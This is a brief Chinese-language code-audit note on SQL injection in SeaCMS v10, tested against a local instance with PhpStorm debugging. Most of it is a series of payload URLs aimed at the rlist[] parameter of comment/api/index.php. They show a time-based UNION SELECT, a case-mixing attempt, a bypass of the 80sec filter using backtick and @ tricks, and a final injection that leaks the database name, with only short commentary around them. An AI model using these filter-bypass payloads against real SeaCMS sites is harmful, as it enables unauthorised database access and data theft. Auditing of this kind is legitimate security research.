seacms代码审计-sql注入

1、环境：seacmsv10

2、注入：http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=gzm

占位符：gzm

phpstorm调试，查看执行语句，在mysql拼接语句复现。

                              

 

3、重新注入：http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1)union%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20#

发现，没有对大小写处理。

 

4、使用大小写绕过，重新注入：http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1)UnIon%20select%201,2,3,4,5,6,7,8,9,10,SLEEP(3%20#

任然被过滤了，从80sec入手

 

5、利用80sec注入http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=1%20or%20@`%27`%20UnIon%20select%201,2,3,4,5,6,7,8,9,10,11`%27`#'

成功逃逸

8、再次注入：http://www.seacmsv10.com/comment/api/index.php/comment/api/index.php?gid=1&page=2&type=1&rlist[]=1)//@**@`%27`**//unIoN--%0ASELECT%23%0A1,2,3,4,5,6,7,8,9,10,database()%23%0Afrom%23%0Asea_admin--%20%27

调试过程

 

 

成功回显数据库名